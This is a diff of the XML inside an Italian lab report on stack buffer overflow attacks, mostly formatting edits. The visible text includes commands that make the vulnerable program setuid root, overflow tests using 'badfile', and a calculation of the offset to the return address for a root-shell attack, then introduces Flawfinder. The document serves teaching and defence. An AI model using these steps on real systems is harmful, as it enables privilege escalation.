+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3171,7 +3486,35 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">L’attacco di tipo Buffer Overflow ha una lunga storia che lo precede, ed è proprio per questo che sono state prese e inventare diverse contromisure per far </w:t>
+        <w:t>L’attacco di tipo Buffer Overflow ha una lunga storia che lo precede, ed è proprio per questo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> motivo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> che sono state prese e inventa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e diverse contromisure per far </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3887,16 +4230,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>prima dell’esecuzione di un progra</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">mma, il sistema operativo ha il compito di preparare l’ambiente necessario e il relativo spazio in memoria. Una contromisura molto comune a livello di OS è </w:t>
+        <w:t xml:space="preserve">prima dell’esecuzione di un programma, il sistema operativo ha il compito di preparare l’ambiente necessario e il relativo spazio in memoria. Una contromisura molto comune a livello di OS è </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4343,7 +4677,7 @@
                 <w:lang w:val="it-IT"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="2" w:name="_Hlk27053812"/>
+            <w:bookmarkStart w:id="1" w:name="_Hlk27053812"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4418,7 +4752,7 @@
           </w:p>
         </w:tc>
       </w:tr>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -5275,7 +5609,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="3" w:name="_Hlk27053878"/>
+            <w:bookmarkStart w:id="2" w:name="_Hlk27053878"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5354,7 +5688,7 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:bookmarkEnd w:id="3"/>
+    <w:bookmarkEnd w:id="2"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
@@ -5682,13 +6016,13 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve">$ </w:t>
             </w:r>
@@ -5696,7 +6030,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>sudo</w:t>
             </w:r>
@@ -5704,7 +6038,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -5712,7 +6046,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>chown</w:t>
             </w:r>
@@ -5720,7 +6054,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> root stack </w:t>
             </w:r>
@@ -5737,7 +6071,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve">$ </w:t>
             </w:r>
@@ -5745,7 +6079,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>sudo</w:t>
             </w:r>
@@ -5753,7 +6087,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -5761,7 +6095,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>chmod</w:t>
             </w:r>
@@ -5769,7 +6103,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> 4755 stack</w:t>
             </w:r>
@@ -5863,13 +6197,13 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>$ echo "</w:t>
             </w:r>
@@ -5877,7 +6211,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>aaaa</w:t>
             </w:r>
@@ -5885,7 +6219,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve">" &gt; </w:t>
             </w:r>
@@ -5893,7 +6227,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>badfile</w:t>
             </w:r>
@@ -5901,14 +6235,14 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:br/>
             </w:r>
@@ -5916,7 +6250,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>$ .</w:t>
             </w:r>
@@ -5924,7 +6258,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve">/stack </w:t>
             </w:r>
@@ -5941,7 +6275,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>Returned Properly</w:t>
             </w:r>
@@ -6028,7 +6362,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>$ echo "</w:t>
             </w:r>
@@ -6036,7 +6370,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>aaa</w:t>
             </w:r>
@@ -6044,7 +6378,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -6052,7 +6386,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>...(</w:t>
             </w:r>
@@ -6060,7 +6394,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve">100 characters omitted)... </w:t>
             </w:r>
@@ -6068,7 +6402,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>aaa</w:t>
             </w:r>
@@ -6076,7 +6410,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve">" &gt; </w:t>
             </w:r>
@@ -6084,7 +6418,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t>badfile</w:t>
             </w:r>
@@ -6092,14 +6426,14 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:br/>
               <w:t xml:space="preserve">$ ./stack </w:t>
@@ -6107,7 +6441,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
               <w:br/>
               <w:t>Segmentation fault (core dumped)</w:t>
@@ -6139,7 +6473,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -6162,16 +6495,6 @@
         </w:rPr>
         <w:t>Controllare che l’ASLR sia disabilitato</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7788,7 +8111,6 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -7828,66 +8150,104 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>0xbfffeaf8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e l’indirizzo del buffer è </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>0xbfffea8c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Andando a calcolare la distanza tra questi due valori si ottiene 108, e dato che il campo per il </w:t>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">0xbfffeaf8 e l’indirizzo del buffer è 0xbfffea8c. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Andando a calcolare la distanza tra questi due valori si ottiene 108, e dato che il campo per il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">eturn </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>return</w:t>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>ddress</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> è 4 bytes avanti rispetto l’</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>address</w:t>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>ebp</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> è 4 bytes avanti rispetto l’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>ebp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
         <w:t xml:space="preserve"> pointer, la distanza sarà 112.</w:t>
       </w:r>
@@ -8861,7 +9221,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Ora tutto è pronto per eseguire il programma C contente l’attacco di tipo BO che, se correttamente implementato, dovrebbe aprire una shell di </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8870,9 +9229,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>comand</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>comandi</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9881,6 +10239,7 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="6"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -9889,6 +10248,839 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">5) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Flawfinder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tester</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>esaminare il codice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="12"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">È un software open source che permette di esaminare codice sorgente C/C++ evidenziando possibili debolezze, ordinate per livello di rischio, prima di un rilascio pubblico. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Utilizza un database di funzioni C/C++ con problemi ben conosciuti (e.g. buffer overflow)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Analizza ogni singola istruzione, senza considerare il contesto</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Al termine dell’esecuzione del programma, viene restituito un elenco di possibili vulnerabilità del codice, ciascuna accompagnata da una possibile motivazio</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="3"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ne e soluzione.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
